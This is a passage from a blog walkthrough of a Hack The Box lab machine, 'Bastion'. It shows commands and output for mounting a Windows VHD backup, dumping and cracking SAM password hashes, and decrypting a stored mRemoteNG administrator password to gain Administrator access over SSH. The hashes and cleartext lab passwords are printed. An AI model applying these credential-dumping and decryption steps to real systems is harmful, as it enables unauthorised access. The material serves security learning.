<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>       <span class="m">7110</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writercd3f2362</span><span class="m">-8</span><span class="n">bef</span><span class="m">-46</span><span class="n">c7</span><span class="m">-9181</span><span class="o">-</span><span class="n">d62844cdc0b2.xml</span>
<span class="o">-</span><span class="n">rwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">1</span> <span class="n">root</span> <span class="n">root</span>    <span class="m">2374620</span> <span class="n">feb</span> <span class="m">22</span>  <span class="m">2019</span> <span class="n">cd113385</span><span class="m">-65</span><span class="n">ff</span><span class="m">-4</span><span class="n">ea2</span><span class="m">-8</span><span class="n">ced</span><span class="m">-5630</span><span class="n">f6feca8f_Writere8132975</span><span class="m">-6</span><span class="n">f93</span><span class="m">-4464</span><span class="o">-</span><span class="n">a53e</span><span class="m">-1050253</span><span class="n">ae220.xml</span>
</code></pre></div><p>OMG! A bunch of files, xml files are not actually interesting here, we&rsquo;ll focus on vhd files. We have 2 files, we&rsquo;ll get a mount of the bigger one (5gb lmao). After a little research I figured out that we can mount a vhd file with guestmount -&gt; <code>https://xo.tc/how-to-mount-a-vhd-file-on-linux.html</code> :</p>
<p><code>mkdir /mnt/vhd-mount</code></p>
<p><code>guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro /mnt/vhd-mount/ -m /dev/sda1</code></p>
<pre><code>'$Recycle.Bin'   autoexec.bat   config.sys  'Documents and Settings'   pagefile.sys   PerfLogs  'Program Files'   ProgramData   Recovery  'System Volume Information'   Users   Windows
</code></pre><p>Awesome, let&rsquo;s see if we can get anything interesting from here :</p>
<p>After a long research, I found this inside &ldquo;/Windows/System32/config&rdquo; :</p>
<pre><code>BCD-Template                                                                                  COMPONENTS.LOG   SAM.LOG        SOFTWARE.LOG2
BCD-Template.LOG                                                                              COMPONENTS.LOG1  SAM.LOG1       SYSTEM
COMPONENTS                                                                                    COMPONENTS.LOG2  SAM.LOG2       SYSTEM.LOG
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms                            DEFAULT          SECURITY       SYSTEM.LOG1
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms                            DEFAULT.LOG      SECURITY.LOG   SYSTEM.LOG2
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms                            DEFAULT.LOG1     SECURITY.LOG1  systemprofile
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf                                      DEFAULT.LOG2     SECURITY.LOG2  TxR
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf                                       Journal          SOFTWARE
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms  RegBack          SOFTWARE.LOG
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms  SAM              SOFTWARE.LOG1
</code></pre><p>Here we can see some SAM files, those files are &ldquo;Security Account Management&rdquo;, so maybe we can get some hashed creds from it, but we can&rsquo;t read the file, we have to dump the info, in my case I used &ldquo;samdump2&rdquo;</p>
<p><code>samdump2 SYSTEM SAM</code></p>
<div class="highlight"><pre class="chroma"><code class="language-SH" data-lang="SH">*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
</code></pre></div><p>OH YEAHH! Let&rsquo;s try luck cracking them with john:</p>
<p><code>john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=NT</code></p>
<p><code>john --show hash --format=NT</code></p>
<pre><code>*disabled* Administrator::500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

3 password hashes cracked, 0 left
</code></pre><p>We got it! Let&rsquo;s login :</p>
<h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<pre><code>Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje&gt;                                                                                                 
</code></pre><p>We&rsquo;re in, I&rsquo;m not really experienced in Windows privesc, so I followed this steps -&gt; <code>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---processes-enumeration-and-tasks</code> :</p>
<p>Looking inside &ldquo;l4mpje@BASTION C:\Program Files (x86)&gt;&rdquo; I found this : 
up there, let&rsquo;s see what&rsquo;s inside :</p>
<pre><code>Microsoft.NET                                                                                    
22-02-2019  14:01    &lt;DIR&gt;          mRemoteNG                                                                                        
23-02-2019  10:22    &lt;DIR&gt;          Windows Defender                                                                                 
23-02-2019  09:38    &lt;DIR&gt;          Windows Mail                                                                                     
23-02-2019  10:22    &lt;DIR&gt;          Windows Media Player                                                                             
16-07-2016  14:23    &lt;DIR&gt;          Windows Multimedia Platform                                                                      
16-07-2016  14:23    &lt;DIR&gt;          Windows NT                                                                                       
23-02-2019  10:22    &lt;DIR&gt;          Windows Photo Viewer                                                                             
16-07-2016  14:23    &lt;DIR&gt;          Windows Portable Devices                                                                         
16-07-2016  14:23    &lt;DIR&gt;          WindowsPowerShell                                                                                
               0 File(s)              0 bytes                                                                                        
              14 Dir(s)  11.316.715.520 bytes free
</code></pre><p>Hmm mRemoteNG is not actually a usual file, so, let&rsquo;s see if that process is in L4mpje&rsquo;s &ldquo;AppData&rdquo; directory.</p>
<pre><code> Directory of C:\Users\L4mpje\AppData\Roaming                                                                                        
                                                                                                                                     
22-02-2019  14:01    &lt;DIR&gt;          .                                                                                                
22-02-2019  14:01    &lt;DIR&gt;          ..                                                                                               
22-02-2019  13:50    &lt;DIR&gt;          Adobe                                                                                            
22-02-2019  14:03    &lt;DIR&gt;          mRemoteNG                                                                                        
               0 File(s)              0 bytes                                                                                        
               4 Dir(s)  11.316.715.520 bytes free   
</code></pre><p>So there it is, let&rsquo;s see inside :</p>
<pre><code>22-02-2019  14:03    &lt;DIR&gt;          .                                                                                                
22-02-2019  14:03    &lt;DIR&gt;          ..                                                                                               
22-02-2019  14:03             6.316 confCons.xml                                                                                     
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup                                                          
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup                                                          
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup                                                          
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup                                                          
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup                                                          
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup                                                          
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup                                                          
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup                                                          
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup                                                          
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup                                                          
22-02-2019  14:03                51 extApps.xml                                                                                      
22-02-2019  14:03             5.217 mRemoteNG.log                                                                                    
22-02-2019  14:03             2.245 pnlLayout.xml                                                                                    
22-02-2019  14:01    &lt;DIR&gt;          Themes                                                                                           
              14 File(s)         76.577 bytes                                                                                        
               3 Dir(s)  11.316.715.520 bytes free     
</code></pre><p>confCons.xml could be interesting, let&rsquo;s read it and filter by password :</p>
<p><code>findstr &quot;Password&quot; confCons.xml</code></p>
<pre><code>    &lt;Node Name=&quot;DC&quot; Type=&quot;Connection&quot; Descr=&quot;&quot; Icon=&quot;mRemoteNG&quot; Panel=&quot;General&quot; Id=&quot;500e7d58-662a-44d4-aff0-3a4f547a3fee&quot; Userna     
me=&quot;Administrator&quot; Domain=&quot;&quot; Password=&quot;aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==&quot;     
 Hostname=&quot;127.0.0.1&quot; Protocol=&quot;RDP&quot; PuttySession=&quot;Default Settings&quot; Port=&quot;3389&quot; ConnectToConsole=&quot;false&quot; UseCredSsp=&quot;true&quot; Rend     
eringEngine=&quot;IE&quot; ICAEncryptionStrength=&quot;EncrBasic&quot; RDPAuthenticationLevel=&quot;NoAuth&quot; RDPMinutesToIdleTimeout=&quot;0&quot; RDPAlertIdleTimeo     
ut=&quot;false&quot; LoadBalanceInfo=&quot;&quot; Colors=&quot;Colors16Bit&quot; Resolution=&quot;FitToWindow&quot; AutomaticResize=&quot;true&quot; DisplayWallpaper=&quot;false&quot; Disp     
layThemes=&quot;false&quot; EnableFontSmoothing=&quot;false&quot; EnableDesktopComposition=&quot;false&quot; CacheBitmaps=&quot;false&quot; RedirectDiskDrives=&quot;false&quot; R     
edirectPorts=&quot;false&quot; RedirectPrinters=&quot;false&quot; RedirectSmartCards=&quot;false&quot; RedirectSound=&quot;DoNotPlay&quot; SoundQuality=&quot;Dynamic&quot; Redire     
ctKeys=&quot;false&quot; Connected=&quot;false&quot; PreExtApp=&quot;&quot; PostExtApp=&quot;&quot; MacAddress=&quot;&quot; UserField=&quot;&quot; ExtApp=&quot;&quot; VNCCompression=&quot;CompNone&quot; VNCEn     
coding=&quot;EncHextile&quot; VNCAuthMode=&quot;AuthVNC&quot; VNCProxyType=&quot;ProxyNone&quot; VNCProxyIP=&quot;&quot; VNCProxyPort=&quot;0&quot; VNCProxyUsername=&quot;&quot; VNCProxyPa     
ssword=&quot;&quot; VNCColors=&quot;ColNormal&quot; VNCSmartSizeMode=&quot;SmartSAspect&quot; VNCViewOnly=&quot;false&quot; RDGatewayUsageMethod=&quot;Never&quot; RDGatewayHostna     
me=&quot;&quot; RDGatewayUseConnectionCredentials=&quot;Yes&quot; RDGatewayUsername=&quot;&quot; RDGatewayPassword=&quot;&quot; RDGatewayDomain=&quot;&quot; InheritCacheBitmaps=&quot;     
false&quot; InheritColors=&quot;false&quot; InheritDescription=&quot;false&quot; InheritDisplayThemes=&quot;false&quot; InheritDisplayWallpaper=&quot;false&quot; InheritEnab     
leFontSmoothing=&quot;false&quot; InheritEnableDesktopComposition=&quot;false&quot; InheritDomain=&quot;false&quot; InheritIcon=&quot;false&quot; InheritPanel=&quot;false&quot; I     
nheritPassword=&quot;false&quot; InheritPort=&quot;false&quot; InheritProtocol=&quot;false&quot; InheritPuttySession=&quot;false&quot; InheritRedirectDiskDrives=&quot;false&quot;     
 InheritRedirectKeys=&quot;false&quot; InheritRedirectPorts=&quot;false&quot; InheritRedirectPrinters=&quot;false&quot; InheritRedirectSmartCards=&quot;false&quot; Inhe     
ritRedirectSound=&quot;false&quot; InheritSoundQuality=&quot;false&quot; InheritResolution=&quot;false&quot; InheritAutomaticResize=&quot;false&quot; InheritUseConsoleS     
ession=&quot;false&quot; InheritUseCredSsp=&quot;false&quot; InheritRenderingEngine=&quot;false&quot; InheritUsername=&quot;false&quot; InheritICAEncryptionStrength=&quot;fa     
lse&quot; InheritRDPAuthenticationLevel=&quot;false&quot; InheritRDPMinutesToIdleTimeout=&quot;false&quot; InheritRDPAlertIdleTimeout=&quot;false&quot; InheritLoad     
BalanceInfo=&quot;false&quot; InheritPreExtApp=&quot;false&quot; InheritPostExtApp=&quot;false&quot; InheritMacAddress=&quot;false&quot; InheritUserField=&quot;false&quot; Inheri     
tExtApp=&quot;false&quot; InheritVNCCompression=&quot;false&quot; InheritVNCEncoding=&quot;false&quot; InheritVNCAuthMode=&quot;false&quot; InheritVNCProxyType=&quot;false&quot;      
InheritVNCProxyIP=&quot;false&quot; InheritVNCProxyPort=&quot;false&quot; InheritVNCProxyUsername=&quot;false&quot; InheritVNCProxyPassword=&quot;false&quot; InheritVNC     
Colors=&quot;false&quot; InheritVNCSmartSizeMode=&quot;false&quot; InheritVNCViewOnly=&quot;false&quot; InheritRDGatewayUsageMethod=&quot;false&quot; InheritRDGatewayHo     
stname=&quot;false&quot; InheritRDGatewayUseConnectionCredentials=&quot;false&quot; InheritRDGatewayUsername=&quot;false&quot; InheritRDGatewayPassword=&quot;false     
&quot; InheritRDGatewayDomain=&quot;false&quot; /&gt;
</code></pre><p>Oh we can see a password : &ldquo;aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==&rdquo;</p>
<p>But it&rsquo;s crypted, so we have to decrypt it, I found a github script for mRemoteNG passwords -&gt; <code>https://github.com/haseebT/mRemoteNG-Decrypt</code>. Let&rsquo;s run the script :</p>
<p><code>python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==</code></p>
<pre><code>Password: thXLHM96BeKL0ER2
</code></pre><p>Yoooo! Let&rsquo;s see if we can access as Administrator : s</p>
<p><code>ssh Administrator@10.10.10.134</code></p>
<pre><code>Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator&gt;                  
</code></pre><h1 id="thanks-for-reading">THANKS FOR READING!!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
